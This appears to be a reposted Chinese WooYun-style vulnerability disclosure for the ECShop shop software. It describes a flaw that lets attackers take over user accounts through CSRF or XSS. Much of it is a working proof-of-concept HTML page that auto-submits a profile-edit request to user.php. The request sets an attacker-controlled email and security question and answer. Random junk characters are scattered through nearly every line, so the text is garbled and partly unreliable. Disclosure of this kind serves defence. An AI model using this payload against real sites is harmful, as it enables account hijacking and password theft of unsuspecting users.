简要描述:& v5 S* ], i- s+ ~) {. V
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现% c) y& K6 {" U# \ C1 W |
- Z, [& m: p; U" b
Demo For:http://www.wooyun.org/bug.php?action=view&id=3953 q: {, v( a; O0 R4 }9 R7 y
: S6 Z; M% _' b3 m/ ?详细说明:/ b6 J1 N( B$ O6 A9 H- F
利用csrf和xss可以突破官方所说的“障碍”
- d: v) | N/ L% _0 \1 fxss版本已经有人说明
1 X! b! h& q$ Z8 a, F2 M这里给出csrf版本
0 h$ M6 t" E8 B1 p& S# q6 C, |6 i3 D7 z6 J$ |/ N
漏洞证明:, P$ f$ y" U' W+ A# Q3 i* A) v
<html>) H8 j5 p0 ~1 K/ p$ e
<body>* M: K( U6 d, L
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
' J0 E' |9 g8 U3 e( f9 X8 J4 d<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">2 B) C% ]2 ?8 `- R: Q9 a
<INPUT TYPE="text" NAME="act" value="act_edit_profile">2 w7 L; R' d! @8 N9 }
<INPUT TYPE="text" NAME="sel_question" value="ecshop">* M8 m2 W# j9 A$ S2 [& L6 ~
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
5 g" [( [) n M+ G3 L+ `</body># q1 ]" U) M- c1 S, Y! V
<script>
* k1 h$ N- b8 e, |* o8 F7 kdocument.forms[0].submit();1 z$ W% { T/ |2 V) ?
</script>! M# E9 M- w! V! ~
</html>2 W$ I T) y* f
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
1 `# q* {9 H. F3 Y/ y. ~* V V, B, X) H6 U0 G7 [
|